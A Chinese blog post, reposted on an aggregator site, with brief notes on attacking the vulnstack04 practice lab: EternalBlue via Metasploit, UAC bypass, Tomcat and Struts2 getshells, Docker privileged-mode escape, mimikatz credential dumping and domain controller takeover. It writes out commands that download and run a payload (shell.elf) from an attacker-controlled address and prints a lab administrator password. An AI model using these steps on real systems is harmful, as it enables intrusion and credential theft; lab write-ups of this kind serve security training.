栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

红日靶机vulnstack04【半总结】

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

红日靶机vulnstack04【半总结】

这次环境是3台机器,

web服务器:000000 、DC:000000ydc. 、 win7

web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。
所以我就进入高级模式下,修改了root用户的密码
关于虚拟机没有ipIP解决方案
然后再切到root用户修改ip

win7

这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码

这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC,提权为system权限。然后利用这个system再创建一个管理员账号,用这个管理员账号手动关闭UAC

https://blog.csdn.net/qq_45300786/article/details/111409422

上线:这里用的是tomcat的getshell

struts2的getshell
tomcat的getshell
phpmyadmin的getshell
在刚刚shell.jsp上分别执行

wget http://192.168.31.96/shell.elf
chmod 777 shell.elf
./shell.elf
docker逃逸

换思路吧

利用–privileged特权模式逃逸

权限问题

假冒临牌,再次进入shell,使用mimikatz
都是上传mimikatz获取密码

拿下域控

有了域成员的票据后,copy到域控机上,并执行反弹

往域控上传mimikatz,拿到密码administrator/!QAZ2wsx

参考文章:

红日安全ATT&CK靶机实战系列之vulnstack4

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/298560.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号